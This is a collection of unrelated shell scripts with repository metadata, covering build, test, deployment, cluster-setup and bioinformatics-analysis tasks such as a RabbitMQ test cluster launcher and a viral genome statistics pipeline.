    echo "Usage: ${0}"
    echo " -f : Output to file 'deploy-fail-DATE' as well. (default: False)"
    echo " -s : Name of the stack to analyze. (default: overcloud)"
    echo " -l : Level of depth for the stack. (default: 3)"
    echo ""
    echo "Think about sourcing your FILErc, this script will NOT do it."
}

while getopts "fs:l:h" opt; do
    case ${opt} in
        f)
            OUTPUT_TO_FILE=true
            ;;
        s)
            STACK=${OPTARG}
            ;;
        l)
            LEVEL=${OPTARG}
            ;;
        h)
            _usage
            exit 0
            ;;
        \?)
            _usage
            exit 1
            ;;
    esac
done

# Mirror all stdout/stderr into the log file as well when -f was given.
if ${OUTPUT_TO_FILE}; then
    exec > >(tee ${FILE})
    exec 2>&1
fi

# Collect the ids of every FAILED resource, then print each resource's
# deployment output and the nova server it ran on.
RESOURCES=$(heat resource-list -n ${LEVEL} ${STACK} | awk '/FAILED/{print $4}')
for rsc_id in ${RESOURCES}
do
    echo "Resource ${rsc_id}:"
    heat deployment-output-show ${rsc_id} --all
    HEAT_OUTPUT="$(heat deployment-show ${rsc_id})"
    if ! [ -z "${HEAT_OUTPUT}" ]; then
        # extract the server UUID and resolve it to "name => IP" via nova
        SERVER_ID=$(echo ${HEAT_OUTPUT} | grep -oP "server_id.*?," | grep -o ${MATCH_DEPLOY})
        echo "Server $(nova list | awk "/${SERVER_ID}/{print \$4 \" => \" \$12}")"
    fi
    echo '-------------------------'
done
exit 0
| true
|
5a0283466943a0580066ea7b387bfd68919fd4f9
|
Shell
|
ldclakmal/ballerina-security
|
/scenarios/e-commerce-system/test.sh
|
UTF-8
| 1,020
| 2.59375
| 3
|
[
"Apache-2.0"
] |
permissive
|
# End-to-end test for the e-commerce sample: boot the WSO2IS STS, four
# Ballerina services and the API gateway, run the client, and assert on
# selected fields of its JSON response (requires jq).
source assert.sh
echo -e "\n--- Starting WSO2IS STS ---"
docker run -p 9443:9443 ldclakmal/wso2is-sts:latest &
# generous waits give each component time to come up before its dependents
sleep 90s
echo -e "\n--- Starting Payment Service ---"
cd payment_service
bal run &
sleep 20s
echo -e "\n--- Starting Delivery Service ---"
cd ../delivery_service
bal run &
sleep 20s
echo -e "\n--- Starting Inventory Service ---"
cd ../inventory_service
bal run &
sleep 20s
echo -e "\n--- Starting Order Service ---"
cd ../order_service
bal run &
sleep 20s
echo -e "\n--- Starting API Gateway ---"
cd ../api_gateway
bal run &
sleep 20s
echo -e "\n--- Starting Client ---"
cd ../client
# the client prints its aggregated JSON response on the last output line
response=$(bal run 2>&1 | tail -n 1)
assertNotEmpty "$response"
echo -e "\nBallerina client response: $response"
search_response=$(jq -r '.search_response.data.electronics[0].brand' <<< $response)
assertNotEmpty $search_response
assertEquals "$search_response" "Apple"
order_response=$(jq -r '.order_response.payment.order_id' <<< $response)
assertNotEmpty $order_response
assertEquals "$order_response" "HQCKJ5496"
| true
|
c235a5871c1b2a4020531a4ae601a64a8ee5bb5c
|
Shell
|
tudor-berariu/bricks-ml-assignment
|
/2015/bricks/start_server.sh
|
UTF-8
| 1,007
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch the bricks game server with the board size and brick distribution
# of the chosen scenario (1-4), recreating the IPC pipes around the run.
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <scenario>"
    exit
fi

./delete_pipes.sh
./create_pipes.sh

make

# NOTE(review): the lone "/" after each "--verbose 0 \" continuation is
# passed to the server as an extra positional argument — looks accidental
# (probably a typo for a plain backslash-free line end); confirm upstream.
if [ "$1" -eq 1 ]; then
    ./bricks-game-server --gamesNo 1000000 --height 4 --width 4 \
        --bricks distributions/dist1 \
        --verbose 0 \
        /
fi

if [ "$1" -eq 2 ]; then
    ./bricks-game-server --gamesNo 1000000 --height 8 --width 5 \
        --bricks distributions/dist2 \
        --verbose 0 \
        /
fi

if [ "$1" -eq 3 ]; then
    ./bricks-game-server --gamesNo 1000000 --height 8 --width 5 \
        --bricks distributions/dist3 \
        --verbose 0 \
        /
fi

if [ "$1" -eq 4 ]; then
    ./bricks-game-server --gamesNo 1000000 --height 8 --width 6 \
        --bricks distributions/dist4 \
        --verbose 0 \
        /
fi

./delete_pipes.sh
| true
|
d04664cc0775299b4c0806737cc9be5f45fc5e9f
|
Shell
|
xCloudx8/Analysis_fasta_file_genomes
|
/analysis_virus.sh
|
UTF-8
| 3,027
| 2.828125
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/bash
# Run the IGTools analysis pipeline over a fixed set of viral genomes:
# genome statistics, k-mer statistics (k=6..24), multiplicity distributions
# and repeat-length distributions, all written under /Project/Reports.
# Inputs are the pre-built .3bit/.nelsa files under /Project/Virus.
VIRUSES=(
"Pseudomonas_phage_phi-6_segment_L"
"Enterobacteria_phage_phiX174_sensu_lato"
"Enterobacteria_phage_T4"
"Bacillus_phage_phi29"
"Enterobacteria_phage_T5"
"Sulfolobus_spindle-shaped_virus_4"
"Enterobacteria_phage_M13"
"Sulfolobus_islandicus_rod-shaped_virus_1"
"Enterobacteria_phage_T7"
"Escherichia_phage_P13374"
"Acidianus_filamentous_virus_1"
"Acidianus_two-tailed_virus"
"Cyanophage_P-RSM6"
"Aeromonas_phage_PX29"
"Aeromonas_phage_Aeh1"
)
# Phase 1: per-genome summary statistics (tabs normalized from runs of spaces).
for f in "${VIRUSES[@]}"
do
echo "Done with GenomeStats for: " $f
java -cp IGTools_cli.jar igtools.cli.GenomeStats /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa df -h | sed 's/ */\t/g' > /Project/Reports/Virus_Reports/"$f".csv
done
./order.py
echo "Ordered"
# Phase 2: k-mer statistics for k in 6..24.
for f in "${VIRUSES[@]}"
do
echo "Please wait GenomeKStats for: " $f
java -cp IGTools_cli.jar igtools.cli.GenomeKStats "6" "24" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa df -h | sed 's/ */\t/g' > /Project/Reports/Virus_Reports/FromK/"$f".csv
done
# Phase 3: multiplicity distributions per k, plus min/avg/max summaries.
rm /Project/Reports/Virus_distr/mdistr/*.mdistr
rm /Project/Reports/Virus_distr/minmaxavg/*.csv
echo "Removed all mdistr"
for f in "${VIRUSES[@]}"
do
for m in {6..24}
do
echo "Analizing MultiplicityDistribution: "$f " " $m
echo "-------------------------------------------------------------------------k='$m'" >> /Project/Reports/Virus_distr/mdistr/"$f".mdistr
java -cp IGTools_cli.jar igtools.cli.distributions.MultiplicityDistribution $m "a" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa | awk '{min=9999}; /#/ {num+=1; tot+=$3; if ($3<min) min=$3; if ($3>max) max=$3} END{ print min " " tot/num " " max }' >> /Project/Reports/Virus_distr/minmaxavg/"$f"min_avg_max.csv
echo " " >> /Project/Reports/Virus_distr/mdistr/"$f".mdistr
java -cp IGTools_cli.jar igtools.cli.distributions.MultiplicityDistribution $m "a" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa >> /Project/Reports/Virus_distr/mdistr/"$f".mdistr
done
done
# Phase 4: repeat-length distributions for lengths 1..100; the first four
# lines of each FromK csv are dropped and a header row is prepended.
rm /Project/Reports/Virus_distr/rldistr/*.rldistr
echo "Removed all rldistr"
for f in "${VIRUSES[@]}"
do
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
for m in {1..100}
do
echo "Analizing RepeatLengthDistribution: "$f " " $m
echo "------------------------------------------------------------------------- k='$m'" >> /Project/Reports/Virus_distr/rldistr/"$f".rldistr
java -cp IGTools_cli.jar igtools.cli.distributions.RepeatLengthDistribution $m "a" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa >> /Project/Reports/Virus_distr/rldistr/"$f".rldistr
done
sed -i '1 i\k |D_k| |H_k| |R_k| |T_k| |E_k|' /Project/Reports/Virus_Reports/FromK/"$f".csv
done
./concatenating_virus.py
| true
|
3251291672c0e26426189d612dcdffa28cf6a30f
|
Shell
|
SURAJTHEGREAT/dockerpymongowebframework
|
/bin/write-env.sh
|
UTF-8
| 1,541
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Create env files in the specified directory (default: conf).
# Each file is written only if it does not already exist, so previously
# generated configuration is never overwritten. Optional settings are
# emitted as commented-out placeholders when their variable is unset.
CONF_DIR=${1:-conf}
mkdir -p "${CONF_DIR}"

if [ ! -f "${CONF_DIR}/mongo.env" ]; then
  echo "MONGO_HOST=${MONGO_HOST:-mongo_db}" > "${CONF_DIR}/mongo.env"
  echo "MONGO_PORT=${MONGO_PORT:-27017}" >> "${CONF_DIR}/mongo.env"
  # Quote the tested values: unquoted, an unset variable collapsed the test
  # to `[ -z ]`, which only worked by accident.
  if [ -z "${MONGO_DB}" ]; then
    echo "#MONGO_DB=" >> "${CONF_DIR}/mongo.env"
  else
    echo "MONGO_DB=${MONGO_DB}" >> "${CONF_DIR}/mongo.env"
  fi
  if [ -z "${MONGO_USER}" ]; then
    echo "#MONGO_USER=" >> "${CONF_DIR}/mongo.env"
  else
    echo "MONGO_USER=${MONGO_USER}" >> "${CONF_DIR}/mongo.env"
  fi
  if [ -z "${MONGO_PASS}" ]; then
    echo "#MONGO_PASS=" >> "${CONF_DIR}/mongo.env"
  else
    echo "MONGO_PASS=${MONGO_PASS}" >> "${CONF_DIR}/mongo.env"
  fi
fi

if [ ! -f "${CONF_DIR}/proxy.env" ]; then
  echo "proxy_enabled=${proxy_enabled:-False}" > "${CONF_DIR}/proxy.env"
  echo "#assoc_id=${assoc_id:- }" >> "${CONF_DIR}/proxy.env"
  echo "#assoc_pwd=${assoc_pwd:- }" >> "${CONF_DIR}/proxy.env"
  echo "#proxy_dns=${proxy_dns:- }" >> "${CONF_DIR}/proxy.env"
  echo "#proxy_port=${proxy_port:- }" >> "${CONF_DIR}/proxy.env"
fi

if [ ! -f "${CONF_DIR}/repo.env" ]; then
  echo "git_user=${git_user:- }" > "${CONF_DIR}/repo.env"
  echo "git_pwd=${git_pwd:- }" >> "${CONF_DIR}/repo.env"
  echo "git_repo=${git_repo:- #bottle-pymongo}" >> "${CONF_DIR}/repo.env"
fi

if [ ! -f "${CONF_DIR}/config.env" ]; then
  echo "CONFIG_PATH=${CONFIG_PATH:- }" > "${CONF_DIR}/config.env"
  echo "WEB_SERVICE=${WEB_SERVICE:- #bottle}" >> "${CONF_DIR}/config.env"
fi
| true
|
d0f284928e69d23158e5641f266e793a5aa7e91a
|
Shell
|
elon-avisror/weather-api
|
/server/weather_api.sh
|
UTF-8
| 562
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/bash
# Pipeline sketch for serving a weather request:
# request.json -> CDS API call -> GRIB result -> JSON -> wheather_response.json.
# NOTE(review): "grib_to_json" and "send" are not standard commands — they are
# presumably provided elsewhere in the deployment; verify before relying on this.
# TODO: check json structure before executing the api call
# run the call_cds_api.py file with the parameters request.json file
python call_cds_api.py < request.json
# get the database (grib) result from the call_cds_api.py file and convert it to json file with the name: result.json (using grib_cli)
grib_to_json result.grib > result.json
# parse result.json file into a wheather_response.json file who describes in https://app.swaggerhub.com/apis/elonavisrur/CropyAPI/1.0.0#/
python parse.py < result.json
# return
send wheather_response.json
| true
|
98180a1aa1dd30eda0e62cb2dbcd7d00b98f6e9f
|
Shell
|
Fei-Guo/multi-tenancy
|
/incubator/virtualcluster/hack/lib/docker-image.sh
|
UTF-8
| 3,540
| 3.921875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Get the set of binaries that run in Docker (on Linux)
# Entry format is "<name-of-binary>,<base-image>".
# Binaries are placed in /usr/local/bin inside the image.
#
# $1 - server architecture
# $2.. - optional explicit binary names; when omitted, the default set is used
get_docker_wrapped_binaries() {
  local arch=$1
  local debian_base_version=v1.0.0
  local debian_iptables_version=v11.0.2

  local targets=()
  # Wrap every explicitly requested binary with the debian base image.
  for target in ${@:2}; do
    targets+=($target,${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version})
  done
  # No targets requested: fall back to the full default set.
  if [ ${#targets[@]} -eq 0 ]; then
    ### If you change any of these lists, please also update VC_ALL_TARGETS
    targets=(
      manager,"${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version}"
      syncer,"${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version}"
      vn-agent,"${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version}"
    )
  fi
  echo "${targets[@]}"
}
# This builds all the release docker images (One docker image per binary)
# Args:
#  $1 - binary_dir, the directory to save the tared images to.
#  $2 - arch, architecture for which we are building docker images.
#  $3.. - optional explicit binary names, forwarded to get_docker_wrapped_binaries.
create_docker_image() {
  local binary_dir="$1"
  local arch="$2"
  local binary_name
  local binaries=($(get_docker_wrapped_binaries "${arch}" "${@:3}"))

  for wrappable in "${binaries[@]}"; do
    # Split the "<binary>,<base image>" pair using a temporary IFS.
    local oldifs=$IFS
    IFS=","
    set $wrappable
    IFS=$oldifs

    local binary_name="$1"
    local base_image=$2
    local image_user=""
    # BASE_IMAGE=distroless switches to a minimal non-root runtime image.
    BASE_IMAGE=${BASE_IMAGE:-debian}
    if [ "$BASE_IMAGE" == "distroless" ]; then
      base_image="gcr.io/distroless/static:nonroot"
      image_user="USER nonroot:nonroot"
    fi

    local docker_build_path="${binary_dir}/${binary_name}.dockerbuild"
    local docker_file_path="${docker_build_path}/Dockerfile"
    local binary_file_path="${binary_dir}/${binary_name}"
    local docker_image_tag="${VC_DOCKER_REGISTRY}/${binary_name}-${arch}:latest"

    echo "Starting docker build for image: ${binary_name}-${arch}"
    # Each image builds in a background subshell with a generated Dockerfile;
    # the binary is hard-linked into the build context to avoid a copy.
    (
      rm -rf "${docker_build_path}"
      mkdir -p "${docker_build_path}"
      ln "${binary_dir}/${binary_name}" "${docker_build_path}/${binary_name}"
      cat <<EOF > "${docker_file_path}"
FROM ${base_image}
COPY ${binary_name} /usr/local/bin/${binary_name}
${image_user}
EOF
      "${DOCKER[@]}" build -q -t "${docker_image_tag}" "${docker_build_path}" >/dev/null
    ) &
  done

  # Barrier: all background builds must succeed.
  wait-for-jobs || { echo "previous Docker build failed"; return 1; }
  echo "Docker builds done"
}
# Package up all of the binaries in docker images
# Args: optional list of binary paths; basenames are used as build targets.
build_images() {
  # Clean out any old images
  rm -rf "${VC_RELEASE_DIR}"
  mkdir -p "${VC_RELEASE_DIR}"
  cd ${VC_BIN_DIR}
  # Strip directories from the arguments so only binary names remain.
  local targets=()
  for arg; do
    targets+=(${arg##*/})
  done
  echo "${targets[@]-}"
  # No explicit targets: stage every known binary for release.
  if [ ${#targets[@]} -eq 0 ]; then
    cp "${VC_ALL_BINARIES[@]/#/}" ${VC_RELEASE_DIR}
  else
    cp ${targets[@]} ${VC_RELEASE_DIR}
  fi
  create_docker_image "${VC_RELEASE_DIR}" "amd64" "${targets[@]-}"
}
| true
|
f0174f9eac4b10406e8017c94cbd31727feca65a
|
Shell
|
binarin/rabbit_destructive_tests
|
/apps/sut/priv/git_checkout_cluster.sh
|
UTF-8
| 2,901
| 3.75
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Spin up a local RabbitMQ test cluster from a git checkout (RABBIT_DIR):
# start NUM_NODES brokers, join them, create test users, set an HA policy.
set -eu
set -o pipefail

export LANG=C

# Set trace=true in the environment for xtrace debugging.
if ${trace:-false}; then
    set -x
fi

ROOT=$(dirname $(readlink -f $0))
RABBIT_DIR=${1:?}
NUM_NODES=${2:-3}
: ${NUM_USERS:=10}

# Print the node numbers 1..$1, one per line.
node-numbers() {
    seq 1 ${1:?}
}

# Kill any running process of the node and wipe its on-disk state.
purge-node() {
    local node_number="${1:?}"
    local node_name
    node_name="$(node-name $node_number)"
    pkill -9 -f "$node_name" || true
    rm -rf "/tmp/rabbitmq-test-instances/$node_name"
}

# Purge then start a broker in the background via the checkout's Makefile.
start-node() {
    local node_number="${1:?}"
    purge-node $node_number
    # erlang.mk is not happy with nested invocations on unrelated projects
    env -i "HOME=$HOME" "PATH=$PATH" make -C "$RABBIT_DIR" \
        run-background-broker \
        RABBITMQ_PID_FILE=$(node-pid-file $node_number) \
        RABBITMQ_NODENAME=$(node-name $node_number) \
        RABBITMQ_NODE_PORT=$(node-port $node_number) \
        RABBITMQ_DIST_PORT=$(node-distribution-port $node_number)
}
# Erlang node name for cluster node N.
node-name() {
    printf 'test-cluster-node-%s@localhost\n' "${1:?}"
}

# AMQP listener port for cluster node N.
node-port() {
    echo $(( 17000 + ${1:?} ))
}

# Erlang distribution port for cluster node N.
node-distribution-port() {
    echo $(( 27000 + ${1:?} ))
}
# Start nodes 1..$1, each freshly purged.
start-n-nodes() {
    local num_nodes="${1:?}"
    for node_number in $(node-numbers $num_nodes) ; do
        start-node $node_number
    done
}

# Join every node after the first argument into the first node's cluster.
join-nodes() {
    local node_to_join
    local target_node_num="${1:?}"
    shift
    for node_num_to_join in "$@"; do
        join-node $node_num_to_join $target_node_num
    done
}

# Join one node into the target node's cluster (stop app, join, restart app).
join-node() {
    local node="${1:?}"
    local target="${2:?}"
    ensure-app-stopped-on-node $node
    run-ctl $node join_cluster $(node-name $target)
    start-app-on-node $node
}

ensure-app-stopped-on-node() {
    run-ctl "${1:?}" stop_app
}

start-app-on-node() {
    run-ctl "${1:?}" start_app
}

# Run rabbitmqctl from the checkout against the given node number.
run-ctl() {
    local node_number="${1:?}"
    shift
    ERL_LIBS="${RABBIT_DIR}/deps" "${RABBIT_DIR}/scripts/rabbitmqctl" -n "$(node-name $node_number)" "$@"
}

wait-nodes() {
    local node_number
    for node_number in "$@"; do
        wait-node $node_number
    done
}

# PID file path used when launching the broker for node N.
node-pid-file() {
    local node_number="${1:?}"
    echo "/tmp/$(node-name $node_number).pid"
}

# Poll (up to 10 tries, 10s timeout each) until the node reports started.
wait-node() {
    local node_number="${1:?}"
    local try_no
    local await_result
    for try_no in $(seq 1 10); do
        await_result="$(run-ctl "$node_number" -t 10 eval "rabbit:await_startup().")"
        if [[ $await_result == ok ]]; then
            return 0
        fi
    done
    return 1
}

create-user() {
    local name="${1:?}"
    local password="${2:?}"
    run-ctl 1 add_user $name $password
}

# Create sut1..sutN users (password equals the user name).
create-users() {
    local num_users="${1:?}"
    local user_suffix
    for user_suffix in $(seq 1 $num_users); do
        create-user "sut$user_suffix" "sut$user_suffix"
    done
}

# Mirror every queue whose name starts with "ha." across all nodes.
set-ha-policy() {
    run-ctl 1 set_policy ha-all "^ha\." '{"ha-mode":"all"}'
}

# Main sequence: boot, cluster, wait, provision users, set HA policy.
start-n-nodes $NUM_NODES
join-nodes $(node-numbers $NUM_NODES)
wait-nodes $(node-numbers $NUM_NODES)
create-users $NUM_USERS
set-ha-policy
| true
|
59a6a5c3148cf345b02bada906896720497a48bc
|
Shell
|
kaltsi/Mass-and-Balance
|
/parse_template.sh
|
ISO-8859-15
| 6,692
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# template-file aircraft.specs [output_dir]
#
set -euo pipefail
debug=${debug:-0}
export LC_CTYPE=C
# Abort the run with a "FAIL: "-tagged diagnostic on stdout.
fail() {
  local msg="FAIL: $*"
  printf '%s\n' "$msg"
  exit 1
}
if [ $# -lt 2 ] ; then
echo "Usage $0 template aircraft.specs [output_dir]"
exit 1
fi
[ ! -f "$1" ] && fail "template file: $1 - not found."
[ ! -f "$2" ] && fail "specs file: $2 - not found."
TEMPLATE_FILE="$1"
SPECS_FILE_PATH="$2"
OUTPUT_DIR=""
[ -n "$3" ] && OUTPUT_DIR="$3"
SPEC_BASE=$(basename ${SPECS_FILE_PATH})
SPEC_FILE=${SPEC_BASE%.*}
SPEC_EXT=${SPEC_BASE##*.}
[ "${SPEC_EXT}" != "specs" ] && fail "Spec file must have .specs extension (${SPEC_EXT})"
if [ -n "${OUTPUT_DIR}" ]; then
OUTPUT_FILE="${OUTPUT_DIR}/${SPEC_FILE}.html"
else
OUTPUT_FILE="${SPEC_FILE}.html"
fi
echo "Handling file: ${SPECS_FILE_PATH}"
# External variables
g_code_line=""
g_saveable=""
g_saveable_group=""
g_saveable_group_value=""
g_name=""
g_extra_mass=""
# These are the known load points. Anything else is considered user-added.
declare -a known=("BASIC_WEIGHT" "FRONT_SEAT" "FUEL" "BAGGAGE"
"TAXI_FUEL" "TOW" "LNDW" "ENDURANCE" "FUEL_FLOW"
"FLIGHT_TIME")
# Succeeds (returns 0) when the first argument equals any of the remaining
# arguments; fails (returns 1) otherwise.
in_array() {
    local candidate
    local wanted=$1
    shift
    for candidate in "$@"; do
        if [ "${candidate}" = "${wanted}" ]; then
            return 0
        fi
    done
    return 1
}
# Emit the JavaScript that declares one load point (l_point) into
# $g_code_line and record its name/saveable metadata in the g_* globals.
#
# name translation unit def min max mom [step]
#
# LP_N_BEW "English" "Suomi" "kg" 0 0 -1 1.923 0.1
#
# LP_I_xxx = interactive load point, declares a saveable variable
# LP_F_xxx = interactive fuel flow row
# LP_C_xxx = interactive checkbox row
# LP_R_xxx = non-interactive load point with result and value cells reversed
# LP_N_xxx = non-interactive load point
create_lp()
{
    [ $# -lt 8 ] && fail "${FUNCNAME} called with $*"
    local lpname=$1
    local lang_en=$2
    local lang_fi=$3
    local unit=$4
    local unit_def=$5
    local unit_min=$6
    local unit_max=$7
    local mom=$8
    local steps=
    [ $# -eq 9 ] && steps=$9
    # interactive variants read their default from the saved settings (.s)
    local save_item=""
    if [ "${lpname:0:5}" == "LP_I_" ] || [ "${lpname:0:5}" == "LP_F_" ] || [ "${lpname:0:5}" == "LP_C_" ]; then
        save_item=".s"
    fi
    # Whatever comes after the first 5 chars
    local the_name="${lpname:5}"
    g_code_line=""
    g_code_line="${the_name}=new l_point(\"${the_name}\","
    g_code_line+=" [${lang_en}, ${lang_fi}],"
    g_code_line+=" ${unit},"
    # For non-interactive elements put the default value in place.
    # For interactive values put the saveable name in place.
    if [ "${lpname:0:5}" == "LP_N_" ] || [ "${lpname:0:5}" == "LP_R_" ]; then
        g_code_line+=" ${unit_def},"
    else
        g_code_line+=" g_defs${save_item}.${the_name},"
    fi
    g_code_line+=" ${unit_min}, ${unit_max}, ${mom}"
    if [ -n "${steps}" ]; then
        g_code_line+=", ${steps}"
    fi
    g_code_line+=");"
    if [ "${lpname:0:5}" == "LP_F_" ]; then
        # fuel flow row
        g_code_line+=" ${the_name}.fuel_flow = true;"
    fi
    g_name="${the_name}"
    g_saveable_group="${the_name} : ${unit_def},"
    g_saveable_group_value="${the_name}.vu.get_si(),"
    # check if this was an unknown load point
    g_extra_mass=""
    in_array "${the_name}" "${known[@]}" || g_extra_mass="${the_name}"
}
# Emit into $g_code_line the JavaScript that pushes the table row for one
# load point, choosing the row class from the LP_?_ prefix.
#
# This expects the input to be of the following format
#
# LP_I_xxx = interactive load point, declares a saveable variable
# LP_F_xxx = interactive fuel flow row
# LP_C_xxx = interactive check box row
# LP_R_xxx = non-interactive load point with result and value cells reversed
# LP_N_xxx = non-interactive load point
create_row()
{
    [ $# -lt 1 ] && fail "${FUNCNAME} called with $*"
    local lpname=$1
    local reverse=""
    local non=""
    local cbox=""
    local the_name="${lpname:5}"
    if [ "${1:0:5}" == "LP_R_" ]; then
        reverse=", \"reverse\""
    fi
    if [ "${1:0:5}" = "LP_N_" ] || [ "${1:0:5}" = "LP_R_" ]; then
        non="non_"
    fi
    if [ "${1:0:5}" = "LP_C_" ]; then
        cbox="cbox_"
    fi
    g_code_line="rows.push(new ${non}${cbox}interactive_row(${the_name}${reverse}));"
}

# Replace every *NAME* placeholder in $OUTPUT_FILE with the given text.
simple_replace()
{
    [ $# -ne 2 ] && fail "${FUNCNAME} needs 2 parameters"
    local a=$1
    local b=$2
    [ -z "$a" ] && fail "${FUNCNAME} got zero length string"
    [ ${debug} -ne 0 ] && echo "Replacing: /$a/ with /$b/"
    # NOTE(review): this substitution looks garbled in the source (the s///
    # delimiters appear unbalanced); verify against the original repository.
    perl -i -pe 'BEGIN{undef $/;} s/\*'$a'\*/.*?/\*\*/'"$b"'smg' ${OUTPUT_FILE}
}
# the modifications will be done on the output file
cp ${TEMPLATE_FILE} ${OUTPUT_FILE}
code_output=""
variable_names=""
saveables_group=""
saveable_group_values=""
extra_mass=""
while read i; do
if [ "${i:0:1}" != "#" ] && [ "${i:0:1}" != " " ] && [ "${i:0:1}" != '' ]; then
name=$(cut -f 1 -d = <<< "$i")
value=$(cut -f 2- -d = <<< "$i")
if [ "${name}" = "LOAD_POINT" ]; then
create_lp ${value}
variable_names="${variable_names}${g_name}\n"
code_output+=$(echo ${g_code_line} | sed -e "s/#/ /g")"\n"
if [ "${value:0:5}" == "LP_I_" ] || [ "${value:0:5}" == "LP_F_" ] || [ "${value:0:5}" == "LP_C_" ]; then
saveables_group+="${g_saveable_group}\n"
saveable_group_values+="${g_saveable_group_value}\n"
fi
create_row ${value}
code_output+="${g_code_line}\n"
if [ -n "${g_extra_mass}" ]; then
extra_mass+=" ${g_extra_mass}"
fi
else
simple_replace "${name}" "${value}"
fi
fi
done < $SPECS_FILE_PATH
simple_replace "REPLACE_TABLE_ROWS" "${code_output}"
for i in $(echo -e ${variable_names} | sed -e "s/\\n/ /g"); do
simple_replace "$i" "$i"
done
simple_replace "SAVEABLES" "${saveables_group}"
simple_replace "SAVEABLE_VALUES" "${saveable_group_values}"
extra_calc_mass=""
extra_mass_calc_moments=""
extra_mass_moments=""
extra_debug_lines=""
create_extra_mass()
{
local i
for i in $*; do
extra_calc_mass+="$i,\n"
extra_mass_calc_moments+="calc_moment($i);\n"
extra_mass_moments+="$i.moment +\n"
extra_debug_lines+="debug.textContent += (\" \" + $i.moment.toFixed(3));\n"
done
}
if [ -n "${extra_mass}" ]; then
create_extra_mass "${extra_mass}"
else
# create empty replace for the extra equipment
create_extra_mass " "
fi
simple_replace "EXTRA_CALC_MASS" "${extra_calc_mass}"
simple_replace "EXTRA_MASS_CALC_MOMENTS" "${extra_mass_calc_moments}"
simple_replace "EXTRA_MASS_MOMENTS" "${extra_mass_moments}"
simple_replace "EXTRA_DEBUG" "${extra_debug_lines}"
# finally hide the debug button from the published sheets
simple_replace "HIDE_DEBUG" " "
echo "Output file is: ${OUTPUT_FILE}"
exit 0
| true
|
04642bac781d9239f2b63ac4eab2972e913c25db
|
Shell
|
ilventu/aur-mirror
|
/guile-ncurses/PKGBUILD
|
UTF-8
| 678
| 2.828125
| 3
|
[] |
no_license
|
# Contributor: tantalum <tantalum at online dot de>
# PKGBUILD for guile-ncurses: Guile bindings for the GNU ncurses library.
pkgname=guile-ncurses
pkgver=1.3
pkgrel=1
pkgdesc='Guile bindings for the GNU NCurses library'
arch=(any)
# NOTE(review): "GLPL3" looks like a typo — upstream license is LGPL3; verify.
license=(GLPL3)
depends=(guile ncurses libunistring)
url=http://www.gnu.org/software/guile-ncurses/
source=(ftp://ftp.gnu.org/gnu/$pkgname/$pkgname-$pkgver.tar.gz)
md5sums=(b9f20e0cbf1f2d19bb7e01c44356f1b7)
build() {
  cd ${srcdir}/${pkgname}-${pkgver}
  # Build against the wide-char ncurses and install into guile's site dir.
  ./configure --prefix=/usr --with-ncursesw --with-guilesitedir="$(guile-config info sitedir)" ||return 1
  make && make DESTDIR=${pkgdir} install ||return 1
  #remove documentation
  if [ -e ${pkgdir}/usr/share/info/dir ]; then
    rm ${pkgdir}/usr/share/info/dir
  fi
}
| true
|
cb2cb9886c2739e450ff5b2ac8114b9cd17f4443
|
Shell
|
luotao1/benchmark
|
/api/run_op_benchmark.sh
|
UTF-8
| 940
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
# Dispatch the op benchmark suite: pick the test module (v1 or v2), create a
# timestamped log directory, and hand off to deploy/main_control.sh in the
# background with all output captured to a log file.

OP_BENCHMARK_ROOT="$( cd "$( dirname "${BASH_SOURCE[0]}")" && pwd )"

test_module_name=${1:-"tests"}
gpu_ids=${2:-"0"}
timestamp=$(date '+%Y%m%d-%H%M%S')

# Map the module name to its log directory; reject anything else.
case "${test_module_name}" in
  tests)
    log_dir_name="logs"
    ;;
  tests_v2)
    log_dir_name="logs_v2"
    ;;
  *)
    echo "Please set test_module_name to \"tests\" or \"tests_v2\""
    exit
    ;;
esac

output_dir=${OP_BENCHMARK_ROOT}/${log_dir_name}/${timestamp}
# -p creates the parent log directory as well, so one call covers both.
mkdir -p "${output_dir}"

tests_dir=${OP_BENCHMARK_ROOT}/${test_module_name}
config_dir=${OP_BENCHMARK_ROOT}/${test_module_name}/configs
log_path=${OP_BENCHMARK_ROOT}/${log_dir_name}/log_${timestamp}.txt

bash ${OP_BENCHMARK_ROOT}/deploy/main_control.sh ${tests_dir} ${config_dir} ${output_dir} ${gpu_ids} "both" "both" > ${log_path} 2>&1 &
| true
|
cd1b5b7a8351a33e600ed7444ee7db478eb3e596
|
Shell
|
xuxiandi/libssdb
|
/build.sh
|
UTF-8
| 1,771
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/sh
# Pre-build configuration for libssdb: select platform link flags, build the
